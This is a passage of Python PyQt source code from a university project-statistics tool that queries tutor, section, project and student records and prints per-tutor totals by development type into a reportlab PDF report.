tray.nivel, sec.siglas, \r\n\t\t\t\t\t\t\t\t\tmet.descripcion, tdes.tipo_desarrollo;\"\"\" % (self.fechaini)\r\n\t\t\t\telse:\r\n\t\t\t\t\tcursor_consulta = \"\"\"SELECT tray.periodo_academico, tut.cedula_tutor, tut.nombre_tutor, tut.apellido_tutor, tray.nivel as trayecto, sec.siglas as seccion, sec.tipo_seccion, \r\n\t\t\t\t\t\t\t\t\tsec.ano_seccion, proy.codigo_proyecto, proy.numero_grupo_proyecto, proy.titulo_proyecto, \r\n\t\t\t\t\t\t\t\t\tmet.descripcion as metodo, tdes.tipo_desarrollo, est.cedula_estudiante, \r\n\t\t\t\t\t\t\t\t\ttray.id_trayecto, sec.id_seccion, met.id_metodo, tdes.id_tipo_desarrollo \r\n\t\t\t\t\t\t\t\t\tFROM proyectos as proy INNER JOIN secciones as sec ON proy.FK_id_seccion = sec.id_seccion\r\n\t\t\t\t\t\t\t\t\tINNER JOIN trayecto as tray ON sec.FK_id_trayecto = tray.id_trayecto\r\n\t\t\t\t\t\t\t\t\tINNER JOIN metodologia as met ON proy.FK_id_metodo = met.id_metodo\r\n\t\t\t\t\t\t\t\t\tINNER JOIN tipo_de_desarrollo AS tdes ON proy.FK_id_tipo_desarrollo = tdes.id_tipo_desarrollo\r\n\t\t\t\t\t\t\t\t\tINNER JOIN es_asesorado as esa ON proy.id_proyecto = esa.FK_id_proyecto and esa.rol = 'Tecnico Metodologico'\r\n\t\t\t\t\t\t\t\t\tINNER JOIN tutores as tut ON tut.cedula_tutor = esa.FK_cedula_tutor\r\n\t\t\t\t\t\t\t\t\tINNER JOIN elaboran as ela ON ela.FK_id_proyecto = proy.id_proyecto\r\n\t\t\t\t\t\t\t\t\tINNER JOIN estudiante as est 
ON est.cedula_estudiante = ela.FK_cedula_estudiante\r\n\t\t\t\t\t\t\t\t\tWHERE tray.periodo_academico >= %i AND tray.periodo_academico <= %i \r\n\t\t\t\t\t\t\t\t\tORDER BY tut.cedula_tutor, sec.ano_seccion, tray.nivel, sec.siglas, \r\n\t\t\t\t\t\t\t\t\tmet.descripcion, tdes.tipo_desarrollo;\"\"\" % (self.fechaini, self.fechafin)\r\n\t\t\telse:\r\n\t\t\t\tcursor_consulta = \"\"\"SELECT tray.periodo_academico, tut.cedula_tutor, tut.nombre_tutor, tut.apellido_tutor, tray.nivel as trayecto, sec.siglas as seccion, sec.tipo_seccion, \r\n\t\t\t\t\t\t\t\t\tsec.ano_seccion, proy.codigo_proyecto, proy.numero_grupo_proyecto, proy.titulo_proyecto, \r\n\t\t\t\t\t\t\t\t\tmet.descripcion as metodo, tdes.tipo_desarrollo, est.cedula_estudiante, \r\n\t\t\t\t\t\t\t\t\ttray.id_trayecto, sec.id_seccion, met.id_metodo, tdes.id_tipo_desarrollo \r\n\t\t\t\t\t\t\t\t\tFROM proyectos as proy INNER JOIN secciones as sec ON proy.FK_id_seccion = sec.id_seccion\r\n\t\t\t\t\t\t\t\t\tINNER JOIN trayecto as tray ON sec.FK_id_trayecto = tray.id_trayecto\r\n\t\t\t\t\t\t\t\t\tINNER JOIN metodologia as met ON proy.FK_id_metodo = met.id_metodo\r\n\t\t\t\t\t\t\t\t\tINNER JOIN tipo_de_desarrollo AS tdes ON proy.FK_id_tipo_desarrollo = tdes.id_tipo_desarrollo\r\n\t\t\t\t\t\t\t\t\tINNER JOIN es_asesorado as esa ON proy.id_proyecto = esa.FK_id_proyecto and esa.rol = 'Tecnico Metodologico'\r\n\t\t\t\t\t\t\t\t\tINNER JOIN tutores as tut ON tut.cedula_tutor = esa.FK_cedula_tutor\r\n\t\t\t\t\t\t\t\t\tINNER JOIN elaboran as ela ON ela.FK_id_proyecto = proy.id_proyecto\r\n\t\t\t\t\t\t\t\t\tINNER JOIN estudiante as est ON est.cedula_estudiante = ela.FK_cedula_estudiante\r\n\t\t\t\t\t\t\t\t\tORDER BY tut.cedula_tutor, sec.ano_seccion, tray.nivel, sec.siglas, \r\n\t\t\t\t\t\t\t\t\tmet.descripcion, tdes.tipo_desarrollo;\"\"\"\r\n\t\tself.cursor.execute(cursor_consulta)\r\n\t\trows = []\r\n\t\tindex = -1\r\n\t\tself.IdProyecto = 0\r\n\t\tself.TotalRegistros = 0\r\n\t\tself.TotalTutores = 0\r\n\t\tself.TotalEstudiantes = 0\r\n\t\tself.TotalProyectosTutor = 0\r\n\t\tself.TotalSInformacion = 0\r\n\t\tself.TotalDWeb = 0\r\n\t\tself.TotalRedes = 0\r\n\t\tself.TotalApps = 0\r\n\t\tself.TotalGeneralProyectos = 0\r\n\t\tself.TotalGeneralEstudiantes = 0\r\n\t\tself.TotalGeneralSInformacion = 0\r\n\t\tself.TotalGeneralDWeb = 0\r\n\t\tself.TotalGeneralRedes = 0\r\n\t\tself.TotalGeneralApps = 0\r\n\t\tlv_cedula = \"\"\r\n\t\tlv_cedula_anterior = \"\"\r\n\t\tlv_ano = \"\"\r\n\t\tlv_ano_anterior = \"\"\r\n\t\tlv_trayecto = \"\"\r\n\t\tlv_trayecto_anterior = \"\"\r\n\t\tlv_seccion = \"\"\r\n\t\tlv_seccion_anterior = \"\"\r\n\t\tlv_tipo_trayecto = \"\"\r\n\t\tlv_tipo_trayecto_anterior = \"\"\r\n\t\tlv_ano_prosecucion = \"\"\r\n\t\tlv_ano_prosecucion_anterior = \"\"\r\n\t\tlv_codigo_proyecto = \"\"\r\n\t\tlv_codigo_proyecto_anterior = \"\"\r\n\t\tagregar = 0\r\n\t\tfor rows in self.cursor:\r\n\t\t\tif rows==[]:\r\n\t\t\t\tself.bdvacia = 1\r\n\t\t\telse:\r\n\t\t\t\tlv_cedula = str(rows[1])\r\n\t\t\t\tlv_nombre = str(rows[2]) + \" \" + str(rows[3])\r\n\t\t\t\tlv_ano = str(rows[0])\r\n\t\t\t\tlv_trayecto = str(rows[4])\r\n\t\t\t\tlv_seccion = str(rows[5])\r\n\t\t\t\tlv_tipo_trayecto = str(rows[6])\r\n\t\t\t\tlv_ano_prosecucion = str(rows[7])\r\n\t\t\t\tlv_codigo_proyecto = str(rows[8])\r\n\t\t\t\tself.TotalGeneralEstudiantes = self.TotalGeneralEstudiantes + 1\r\n\t\t\t\tif self.optDetallado.isChecked():\r\n\t\t\t\t\tif lv_cedula != lv_cedula_anterior or lv_ano != lv_ano_anterior or lv_trayecto != lv_trayecto_anterior or lv_seccion != lv_seccion_anterior or 
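# --- editor's aside (illustrative sketch, not part of the original record) ---
# The SELECTs above splice values into the SQL text with %-formatting; the
# DB-API placeholder style passes them separately instead. A runnable stdlib
# sketch with sqlite3, which uses '?' where psycopg2 uses '%s':
import sqlite3
con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE tutores (cedula_tutor INTEGER)")
con.execute("INSERT INTO tutores VALUES (12345678)")
print(con.execute("SELECT cedula_tutor FROM tutores WHERE cedula_tutor = ?",
                  (12345678,)).fetchone())  # -> (12345678,)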
lv_tipo_trayecto != lv_tipo_trayecto_anterior or lv_ano_prosecucion != lv_ano_prosecucion_anterior:\r\n\t\t\t\t\t\tself.TotalProyectosTutor = 1\r\n\t\t\t\t\t\tself.TotalGeneralProyectos = self.TotalGeneralProyectos + 1\r\n\t\t\t\t\t\tself.TotalEstudiantes = 1\r\n\t\t\t\t\t\tlv_cedula_anterior = lv_cedula \r\n\t\t\t\t\t\tlv_ano_anterior = lv_ano \r\n\t\t\t\t\t\tlv_trayecto_anterior = lv_trayecto\r\n\t\t\t\t\t\tlv_seccion_anterior = lv_seccion\r\n\t\t\t\t\t\tlv_tipo_trayecto_anterior = lv_tipo_trayecto\r\n\t\t\t\t\t\tlv_ano_prosecucion_anterior = lv_ano_prosecucion \r\n\t\t\t\t\t\tagregar = 1\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tself.TotalEstudiantes = self.TotalEstudiantes + 1\r\n\t\t\t\t\t\tagregar = 0\r\n\t\t\t\t\t\tif lv_codigo_proyecto != lv_codigo_proyecto_anterior:\r\n\t\t\t\t\t\t\tself.TotalProyectosTutor = self.TotalProyectosTutor + 1\r\n\t\t\t\telse:\r\n\t\t\t\t\tif lv_cedula != lv_cedula_anterior or lv_ano != lv_ano_anterior:\r\n\t\t\t\t\t\tself.TotalProyectosTutor = 1\r\n\t\t\t\t\t\tself.TotalEstudiantes = 1\r\n\t\t\t\t\t\tagregar = 1\r\n\t\t\t\t\t\tlv_cedula_anterior = lv_cedula\r\n\t\t\t\t\t\tlv_ano_anterior = lv_ano\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tself.TotalEstudiantes = self.TotalEstudiantes + 1\r\n\t\t\t\t\t\tagregar = 0\r\n\t\t\t\t\t\tif lv_codigo_proyecto != lv_codigo_proyecto_anterior:\r\n\t\t\t\t\t\t\tself.TotalProyectosTutor = self.TotalProyectosTutor + 1\r\n\t\t\t\tif str(rows[12]) == \"Sistema de Información\":\r\n\t\t\t\t\tlv_SInformacion = 1\r\n\t\t\t\t\tlv_DWeb = 0\r\n\t\t\t\t\tlv_Redes = 0\r\n\t\t\t\t\tlv_Apps = 0\r\n\t\t\t\telif str(rows[12]) == \"Desarrollo WEB\":\r\n\t\t\t\t\tlv_SInformacion = 0\r\n\t\t\t\t\tlv_DWeb = 1\r\n\t\t\t\t\tlv_Redes = 0\r\n\t\t\t\t\tlv_Apps = 0\r\n\t\t\t\telif str(rows[12]) == \"Implementación de Redes\":\r\n\t\t\t\t\tlv_SInformacion = 0\r\n\t\t\t\t\tlv_DWeb = 0\r\n\t\t\t\t\tlv_Redes = 1\r\n\t\t\t\t\tlv_Apps = 0\r\n\t\t\t\telse:\r\n\t\t\t\t\tlv_SInformacion = 0\r\n\t\t\t\t\tlv_DWeb = 0\r\n\t\t\t\t\tlv_Redes = 0\r\n\t\t\t\t\tlv_Apps = 1\r\n\r\n\t\t\t\tif lv_codigo_proyecto != lv_codigo_proyecto_anterior:\r\n\t\t\t\t\tself.TotalGeneralProyectos = self.TotalGeneralProyectos + 1\r\n\t\t\t\t\tlv_codigo_proyecto_anterior = lv_codigo_proyecto\r\n\t\t\t\t\tif str(rows[12]) == \"Sistema de Información\":\r\n\t\t\t\t\t\tself.TotalGeneralSInformacion = self.TotalGeneralSInformacion + 1\r\n\t\t\t\t\telif str(rows[12]) == \"Desarrollo WEB\":\r\n\t\t\t\t\t\tself.TotalGeneralDWeb = self.TotalGeneralDWeb + 1\r\n\t\t\t\t\telif str(rows[12]) == \"Implementación de Redes\":\r\n\t\t\t\t\t\tself.TotalGeneralRedes = self.TotalGeneralRedes + 1\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tself.TotalGeneralApps = self.TotalGeneralApps + 1\r\n\t\t\t\telse:\r\n\t\t\t\t\tlv_SInformacion = 0\r\n\t\t\t\t\tlv_DWeb = 0\r\n\t\t\t\t\tlv_Redes = 0\r\n\t\t\t\t\tlv_Apps = 0\r\n\r\n\t\t\t\tif agregar == 1:\r\n\t\t\t\t\tindex = index + 1\r\n\t\t\t\t\tself.TotalRegistros = self.TotalRegistros + 1\r\n\t\t\t\t\tself.tablaEstadisticas.insertRow(index)\r\n\t\t\t\t\tself.tablaEstadisticas.setItem(index, 0, QTableWidgetItem(lv_cedula))\r\n\t\t\t\t\tself.tablaEstadisticas.setItem(index, 1, QTableWidgetItem(lv_nombre))\r\n\t\t\t\t\tself.tablaEstadisticas.setItem(index, 2, QTableWidgetItem(lv_ano))\r\n\t\t\t\t\tself.tablaEstadisticas.setItem(index, 3, QTableWidgetItem(lv_trayecto))\r\n\t\t\t\t\tself.tablaEstadisticas.setItem(index, 4, QTableWidgetItem(lv_seccion))\r\n\t\t\t\t\tself.tablaEstadisticas.setItem(index, 5, 
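# --- editor's aside (illustrative sketch, not part of the original record) ---
# The one-hot tallying of tipo_desarrollo above (four parallel counters) can
# be sketched with collections.Counter over the same category labels:
from collections import Counter
tipos = ["Sistema de Información", "Desarrollo WEB", "Sistema de Información"]
print(Counter(tipos))  # Counter({'Sistema de Información': 2, 'Desarrollo WEB': 1})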
QTableWidgetItem(lv_tipo_trayecto))\r\n\t\t\t\t\tself.tablaEstadisticas.setItem(index, 6, QTableWidgetItem(lv_ano_prosecucion))\r\n\t\t\t\t\tself.TotalSInformacion = lv_SInformacion\r\n\t\t\t\t\tself.TotalDWeb = lv_DWeb\r\n\t\t\t\t\tself.TotalRedes = lv_Redes\r\n\t\t\t\t\tself.TotalApps = lv_Apps\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.TotalSInformacion = self.TotalSInformacion + lv_SInformacion\r\n\t\t\t\t\tself.TotalDWeb = self.TotalDWeb + lv_DWeb\r\n\t\t\t\t\tself.TotalRedes = self.TotalRedes + lv_Redes\r\n\t\t\t\t\tself.TotalApps = self.TotalApps + lv_Apps\r\n\r\n\t\t\t\tself.tablaEstadisticas.setItem(index, 7, QTableWidgetItem(str(self.TotalProyectosTutor)))\r\n\t\t\t\tself.tablaEstadisticas.setItem(index, 8, QTableWidgetItem(str(self.TotalEstudiantes)))\r\n\t\t\t\tself.tablaEstadisticas.setItem(index, 9, QTableWidgetItem(str(self.TotalSInformacion)))\r\n\t\t\t\tself.tablaEstadisticas.setItem(index, 10, QTableWidgetItem(str(self.TotalDWeb)))\r\n\t\t\t\tself.tablaEstadisticas.setItem(index, 11, QTableWidgetItem(str(self.TotalRedes)))\r\n\t\t\t\tself.tablaEstadisticas.setItem(index, 12, QTableWidgetItem(str(self.TotalApps)))\r\n\t\t\tself.TotalGeneralProyectos = self.TotalGeneralProyectos + 1\r\n\r\n\r\n\t# Rutina para generar el mes esctrito en el sistema dato que la funcion de \r\n\t# fecha retorna el mes en idioma ingles\r\n\tdef meses(self, mes):\r\n\t\tif mes=='01':\r\n\t\t\tmes_escrito = 'Enero'\r\n\t\telif mes=='02':\r\n\t\t\tmes_escrito = 'Febrero'\r\n\t\telif mes=='03':\r\n\t\t\tmes_escrito = 'Marzo'\r\n\t\telif mes=='04':\r\n\t\t\tmes_escrito = 'Abril'\r\n\t\telif mes=='05':\r\n\t\t\tmes_escrito = 'Mayo'\r\n\t\telif mes=='06':\r\n\t\t\tmes_escrito = 'Junio'\r\n\t\telif mes=='07':\r\n\t\t\tmes_escrito = 'Julio'\r\n\t\telif mes=='08':\r\n\t\t\tmes_escrito = 'Agosto'\r\n\t\telif mes=='09':\r\n\t\t\tmes_escrito = 'Septiembre'\r\n\t\telif mes=='10':\r\n\t\t\tmes_escrito = 'Octubre'\r\n\t\telif mes=='11':\r\n\t\t\tmes_escrito = 'Noviembre'\r\n\t\telse:\r\n\t\t\tmes_escrito = 'Diciembre'\r\n\t\treturn mes_escrito\r\n\r\n\t# Rutina para generar el acumulado de la estadistica a imprimir\r\n\tdef actualizaTotalesGenerales(self):\r\n\t\tself.TotalGeneralEstudiantes = self.TotalGeneralEstudiantes + self.TotalEstudiantes\r\n\t\tself.TotalGeneralProyectos = self.TotalGeneralProyectos + self.TotalProyectos\r\n\t\tself.TotalGeneralSInformacion = self.TotalGeneralSInformacion + self.TotalSInformacion\r\n\t\tself.TotalGeneralDWeb = self.TotalGeneralDWeb + self.TotalDWeb\r\n\t\tself.TotalGeneralRedes = self.TotalGeneralRedes + self.TotalRedes\r\n\t\tself.TotalGeneralApps = self.TotalGeneralApps + self.TotalApps\r\n\r\n\t# Rutina para imprimir linea impresa en el reporte de un registro\r\n\tdef imprimeLineaRegistros(self):\r\n\t\tw, h = letter\r\n\t\tif self.detallado == 1:\r\n\t\t\tif self.cedula_tutor != self.cedula_anterior:\r\n\t\t\t\tif self.cedula_anterior != \"\":\r\n\t\t\t\t\tself.cnv.line(30, h - self.linea, 760, h - self.linea)\r\n\t\t\t\t\tself.linea = self.linea + 15\r\n\t\t\t\t\tself.cnv.drawString(35, h - self.linea, \"Totales del Tutor: \")\r\n\t\t\t\t\tself.cnv.drawString(260, h - self.linea, str(self.TotalTutorEstudiantes))\r\n\t\t\t\t\tself.cnv.drawString(315, h - self.linea, str(self.TotalTutorProyectos))\r\n\t\t\t\t\tself.cnv.drawString(375, h - self.linea, str(self.TotalTutorSInformacion))\r\n\t\t\t\t\tself.cnv.drawString(440, h - self.linea, str(self.TotalTutorDWeb))\r\n\t\t\t\t\tself.cnv.drawString(500, h - self.linea, 
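# --- editor's aside (illustrative sketch, not part of the original record) ---
# The if/elif chain in meses() above collapsed into a lookup table, with the
# same fallback (Diciembre) for any unlisted key:
MESES = {'01': 'Enero', '02': 'Febrero', '03': 'Marzo', '04': 'Abril',
         '05': 'Mayo', '06': 'Junio', '07': 'Julio', '08': 'Agosto',
         '09': 'Septiembre', '10': 'Octubre', '11': 'Noviembre'}
print(MESES.get('10', 'Diciembre'))  # -> Octubre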
str(self.TotalTutorRedes))\r\n\t\t\t\t\tself.cnv.drawString(550, h - self.linea, str(self.TotalTutorApps))\r\n\t\t\t\t\tself.linea = self.linea + 20\r\n\t\t\t\t\tself.contlinea = self.contlinea + 1\r\n\t\t\t\tself.cnv.drawString(50, h - self.linea, self.nombre_tutor)\r\n\t\t\t\tself.linea = self.linea + 20\r\n\t\t\t\tself.contlinea = self.contlinea + 1\r\n\t\t\tself.cnv.drawString(35, h - self.linea, str(self.totalSecciones))\r\n\t\t\tself.cnv.drawString(60, h - self.linea, self.ano_periodo)\r\n\t\t\tself.cnv.drawString(90, h - self.linea, self.trayecto)\r\n\t\t\tself.cnv.drawString(180, h - self.linea, self.seccion)\r\n\t\t\tself.cnv.drawString(260, h - self.linea, str(self.TotalEstudiantes))\r\n\t\t\tself.cnv.drawString(315, h - self.linea, str(self.TotalProyectos))\r\n\t\t\tself.cnv.drawString(375, h - self.linea, str(self.TotalSInformacion))\r\n\t\t\tself.cnv.drawString(440, h - self.linea, str(self.TotalDWeb))\r\n\t\t\tself.cnv.drawString(500, h - self.linea, str(self.TotalRedes))\r\n\t\t\tself.cnv.drawString(550, h - self.linea, str(self.TotalApps))\r\n\t\t\tself.totalSecciones = self.totalSecciones + 1\r\n\t\telse:\r\n\t\t\tself.cnv.drawString(35, h - self.linea, self.nombre_tutor)\r\n\t\t\tself.cnv.drawString(150, h - self.linea, str(self.totalSecciones))\r\n\t\t\tself.cnv.drawString(180, h - self.linea, self.ano_periodo)\r\n\t\t\tself.cnv.drawString(260, h - self.linea, str(self.TotalEstudiantes))\r\n\t\t\tself.cnv.drawString(315, h - self.linea, str(self.TotalProyectos))\r\n\t\t\tself.cnv.drawString(375, h - self.linea, str(self.TotalSInformacion))\r\n\t\t\tself.cnv.drawString(440, h - self.linea, str(self.TotalDWeb))\r\n\t\t\tself.cnv.drawString(500, h - self.linea, str(self.TotalRedes))\r\n\t\t\tself.cnv.drawString(550, h - self.linea, str(self.TotalApps))\r\n\t\t\tself.totalSecciones = self.totalSecciones + 1\r\n\r\n\t# Procedure to generate the statistics document as a PDF for printing\r\n\tdef emitirEstadistica(self):\r\n\t\tw, h = letter\r\n\t\tlv_pagina = 1\r\n\t\tself.cnv = canvas.Canvas(self.archivo, pagesize=landscape(letter))\r\n\t\tif self.optDetallado.isChecked():\r\n\t\t\tself.detallado = 1\r\n\t\telse:\r\n\t\t\tself.detallado = 0\r\n\t\tself.imprimir_encabezado = 1\r\n\t\tself.cedula_tutor=\"\"\r\n\t\tself.nombre_tutor=\"\"\r\n\t\tself.cedula_anterior=\"\"\r\n\t\tself.TotalRegistros = 0\r\n\t\tself.TotalTutores = 0\r\n\t\tself.TotalEstudiantes = 0\r\n\t\tself.TotalProyectos = 0\r\n\t\tself.TotalProyectosTutor = 0\r\n\t\tself.TotalRUP = 0\r\n\t\tself.TotalXP = 0\r\n\t\tself.TotalDMovil = 0\r\n\t\tself.TotalOtrosMetodos = 0\r\n\t\tself.TotalSInformacion = 0\r\n\t\tself.TotalDWeb = 0\r\n\t\tself.TotalRedes = 0\r\n\t\tself.TotalApps = 0\r\n\t\tself.TotalTutorEstudiantes = 0\r\n\t\tself.TotalTutorProyectos = 0\r\n\t\tself.TotalTutorRUP = 0\r\n\t\tself.TotalTutorXP = 0\r\n\t\tself.TotalTutorDMovil = 0\r\n\t\tself.TotalTutorOtrosMetodos = 0\r\n\t\tself.TotalTutorSInformacion = 0\r\n\t\tself.TotalTutorDWeb = 0\r\n\t\tself.TotalTutorRedes = 0\r\n\t\tself.TotalTutorApps = 
0\r\n\t\tself.TotalGeneralEstudiantes = 0\r\n\t\tself.TotalGeneralProyectos = 0\r\n\t\tself.TotalGeneralRUP = 0\r\n\t\tself.TotalGeneralXP = 0\r\n\t\tself.TotalGeneralDMovil = 0\r\n\t\tself.TotalGeneralOtrosMetodos = 0\r\n\t\tself.TotalGeneralSInformacion = 0\r\n\t\tself.TotalGeneralDWeb = 0\r\n\t\tself.TotalGeneralRedes = 0\r\n\t\tself.TotalGeneralApps = 0\r\n\t\tself.RegistroActual = 0\r\n\t\t\r\n\t\tself.ano_periodo = \"\"\r\n\t\tself.trayecto = \"\"\r\n\t\tself.seccion = \"\"\r\n\t\tself.tipo_trayecto = \"\"\r\n\t\tself.ano_prosecucion = \"\"\r\n\r\n\t\tindex = self.tablaEstadisticas.rowCount()\r\n\t\twhile self.RegistroActual < index:\r\n\t\t\tself.cedula_tutor = self.tablaEstadisticas.item(self.RegistroActual, 0).text()\r\n\t\t\tself.nombre_tutor = self.tablaEstadisticas.item(self.RegistroActual, 1).text()\r\n\t\t\tself.ano_periodo = self.tablaEstadisticas.item(self.RegistroActual, 2).text()\r\n\t\t\tself.trayecto = self.tablaEstadisticas.item(self.RegistroActual, 3).text()\r\n\t\t\tself.seccion = self.tablaEstadisticas.item(self.RegistroActual, 4).text()\r\n\t\t\tself.tipo_trayecto = self.tablaEstadisticas.item(self.RegistroActual, 5).text()\r\n\t\t\tself.ano_prosecucion = self.tablaEstadisticas.item(self.RegistroActual, 6).text()\r\n\t\t\tself.TotalProyectos = int(self.tablaEstadisticas.item(self.RegistroActual, 7).text())\r\n\t\t\tself.TotalEstudiantes = int(self.tablaEstadisticas.item(self.RegistroActual, 8).text())\r\n\t\t\tself.TotalSInformacion = int(self.tablaEstadisticas.item(self.RegistroActual, 9).text())\r\n\t\t\tself.TotalDWeb = int(self.tablaEstadisticas.item(self.RegistroActual, 10).text())\r\n\t\t\tself.TotalRedes = int(self.tablaEstadisticas.item(self.RegistroActual, 11).text())\r\n\t\t\tself.TotalApps = int(self.tablaEstadisticas.item(self.RegistroActual, 12).text())\r\n\t\t\tif self.imprimir_encabezado == 1:\r\n\t\t\t\tself.cnv.drawImage(\"./img/Membrete-UPTJAA.jpg\", 50, h - 280, width=700, height=60)\r\n\t\t\t\tself.cnv.setLineWidth(.3)\r\n\t\t\t\tself.cnv.setFont(\"Helvetica\", 10, leading = None)\r\n\t\t\t\tself.cnv.drawString(50, h - 300, \"FECHA: \" + self.fecha1)\r\n\t\t\t\tself.cnv.drawString(680, h - 300, \"PAGINA: \" + str(lv_pagina))\r\n\t\t\t\tself.cnv.setFont(\"Times-Roman\", 14, leading = None)\r\n\t\t\t\tself.cnv.drawString(200, h - 320, \"ESTADISTICAS DE PROYECTOS DEL PNF DE INFORMATICA\")\r\n\t\t\t\tself.cnv.setFont(\"Helvetica\", 10, leading = None)\r\n\t\t\t\tif self.detallado == 1:\r\n\t\t\t\t\tself.cnv.drawString(60, h - 340, \"Periodo\")\r\n\t\t\t\t\tself.cnv.drawString(235, h - 340, \"Cantidad\")\r\n\t\t\t\t\tself.cnv.drawString(295, h - 340, \"Proyectos\")\r\n\t\t\t\t\tself.cnv.drawString(355, h - 340, \"Total\")\r\n\t\t\t\t\tself.cnv.drawString(430, h - 340, \"Total\")\r\n\t\t\t\t\tself.cnv.drawString(490, h - 340, \"Total\")\r\n\t\t\t\t\tself.cnv.drawString(540, h - 340, \"Total\")\r\n\t\t\t\t\tself.cnv.drawString(35, h - 350, \"#\")\r\n\t\t\t\t\tself.cnv.drawString(50, h - 350, \"Academico\")\r\n\t\t\t\t\tself.cnv.drawString(110, h - 350, \"Trayecto\")\r\n\t\t\t\t\tself.cnv.drawString(175, h - 350, \"Seccion\")\r\n\t\t\t\t\tself.cnv.drawString(235, h - 350, \"Estudiantes\")\r\n\t\t\t\t\tself.cnv.drawString(295, h - 350, \"Recibidos\")\r\n\t\t\t\t\tself.cnv.drawString(355, h - 350, \"S.Informacion\")\r\n\t\t\t\t\tself.cnv.drawString(430, h - 350, \"Des. 
Web\")\r\n\t\t\t\t\tself.cnv.drawString(490, h - 350, \"Redes\")\r\n\t\t\t\t\tself.cnv.drawString(540, h - 350, \"APPS\")\r\n\t\t\t\t\tself.cnv.setLineWidth(.3)\r\n\t\t\t\t\tself.cnv.line(30,h - 352,760,h - 352)\r\n\t\t\t\t\tself.cnv.line(30,h - 354,760,h - 354)\r\n\t\t\t\t\tself.TotalTutores = self.TotalTutores + 1\r\n\t\t\t\t\tself.totalSecciones = 1\r\n\t\t\t\t\tself.linea = 370\r\n\t\t\t\t\tself.contlinea = 1\r\n\t\t\t\telse:\r\n\t\t\t\t\t#c.drawString(50, h - 360, \"Cedula: \" + lv_cedula_tutor)\r\n\t\t\t\t\tself.cnv.drawString(185, h - 340, \"Periodo\")\r\n\t\t\t\t\tself.cnv.drawString(235, h - 340, \"Cantidad\")\r\n\t\t\t\t\tself.cnv.drawString(290, h - 340, \"Proyectos\")\r\n\t\t\t\t\tself.cnv.drawString(350, h - 340, \"Total\")\r\n\t\t\t\t\tself.cnv.drawString(425, h - 340, \"Total\")\r\n\t\t\t\t\tself.cnv.drawString(488, h - 340, \"Total\")\r\n\t\t\t\t\tself.cnv.drawString(535, h - 340, \"Total\")\r\n\t\t\t\t\tself.cnv.drawString(35, h - 350, \"Tutor Academico\") \r\n\t\t\t\t\tself.cnv.drawString(120, h - 350, \"Secciones\")\r\n\t\t\t\t\tself.cnv.drawString(175, h - 350, \"Academico\")\r\n\t\t\t\t\tself.cnv.drawString(230, h - 350, \"Estudiantes\")\r\n\t\t\t\t\tself.cnv.drawString(290, h - 350, \"Recibidos\")\r\n\t\t\t\t\tself.cnv.drawString(350, h - 350, \"S.Informacion\")\r\n\t\t\t\t\tself.cnv.drawString(425, h - 350, \"Des. Web\")\r\n\t\t\t\t\tself.cnv.drawString(488, h - 350, \"Redes\")\r\n\t\t\t\t\tself.cnv.drawString(535, h - 350, \"APPS\")\r\n\t\t\t\t\tself.cnv.setLineWidth(.3)\r\n\t\t\t\t\tself.cnv.line(30,h - 352,760,h - 352)\r\n\t\t\t\t\tself.cnv.line(30,h - 354,760,h - 354)\r\n\t\t\t\t\tself.TotalTutores = self.TotalTutores + 1\r\n\t\t\t\t\tself.totalSecciones = 1\r\n\t\t\t\t\tself.linea = 370\r\n\t\t\t\t\tself.contlinea = 1\r\n\t\t\t\tself.imprimir_encabezado = 0\r\n\t\t\tif self.cedula_tutor != self.cedula_anterior:\r\n\t\t\t\tself.totalSecciones=1\r\n\t\t\t\tif self.detallado == 1:\r\n\t\t\t\t\tself.imprimeLineaRegistros()\r\n\t\t\t\t\tself.cedula_anterior = self.cedula_tutor\r\n\t\t\t\t\tself.TotalTutorEstudiantes = self.TotalEstudiantes\r\n\t\t\t\t\tself.TotalTutorProyectos = self.TotalProyectos\r\n\t\t\t\t\tself.TotalTutorSInformacion = self.TotalSInformacion\r\n\t\t\t\t\tself.TotalTutorDWeb = self.TotalDWeb\r\n\t\t\t\t\tself.TotalTutorRedes = self.TotalRedes\r\n\t\t\t\t\tself.TotalTutorApps = self.TotalApps\r\n\t\t\t\t\tself.actualizaTotalesGenerales()\r\n\t\t\t\t\tself.contlinea = self.contlinea + 1\r\n\t\t\t\t\tself.linea = self.linea + 20\r\n\t\t\t\t\tself.RegistroActual = self.RegistroActual + 1\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.imprimeLineaRegistros()\r\n\t\t\t\t\tself.actualizaTotalesGenerales()\r\n\t\t\t\t\tself.contlinea = self.contlinea + 1\r\n\t\t\t\t\tself.linea = self.linea + 20\r\n\t\t\t\t\tself.RegistroActual = self.RegistroActual + 1\r\n\t\t\telse:\r\n\t\t\t\tif self.detallado == 1:\r\n\t\t\t\t\tself.imprimeLineaRegistros()\r\n\t\t\t\t\tself.TotalTutorEstudiantes = self.TotalTutorEstudiantes + self.TotalEstudiantes\r\n\t\t\t\t\tself.TotalTutorProyectos = self.TotalTutorProyectos + self.TotalProyectos\r\n\t\t\t\t\tself.TotalTutorSInformacion = self.TotalTutorSInformacion + self.TotalSInformacion\r\n\t\t\t\t\tself.TotalTutorDWeb = self.TotalTutorDWeb + self.TotalDWeb\r\n\t\t\t\t\tself.TotalTutorRedes = self.TotalTutorRedes + self.TotalRedes\r\n\t\t\t\t\tself.TotalTutorApps = self.TotalTutorApps + self.TotalApps\r\n\t\t\t\t\tself.actualizaTotalesGenerales()\r\n\t\t\t\t\tself.contlinea = self.contlinea + 1\r\n\t\t\t\t\tself.linea = self.linea + 
